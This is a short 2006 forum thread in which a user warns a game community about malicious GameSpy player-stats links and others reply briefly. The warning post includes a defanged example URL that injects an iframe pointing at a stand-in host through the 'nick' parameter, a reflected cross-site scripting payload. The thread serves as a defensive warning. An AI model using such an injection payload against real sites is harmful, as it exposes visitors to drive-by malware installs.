PDA

View Full Version : Beware gamespy stats links



Mnementh
13th Jun 06, 3:48 PM
Just had some knobber come onto irc and paste a link to gamespy player stats, but it was a malformed url that can redirect even firefox to a site that uses one of the newer exploits to install/run crud on your system.

http://gamestats.gamespy.com/whammer40kwa/player.asp?nick=%3ciframe%20src%3dhttp://blar.blar.blar/%7ern%3e

(dont worry, Ive cleaned the url above so it points at at a fake domain)

This more than likely works on a few game stats systems, but its just odd that its being used to target dow specifically.

ceejayoz
13th Jun 06, 4:25 PM
OH NO MY MAC IS GOING TO... oh, wait. Nevermind! ;p

(cheers, Mnementh)

SquidDNA
13th Jun 06, 7:16 PM
Did you get him banned?

Corsix
14th Jun 06, 9:07 AM
Hmm, potential cross site scripting exploits here courtesy of Gamespy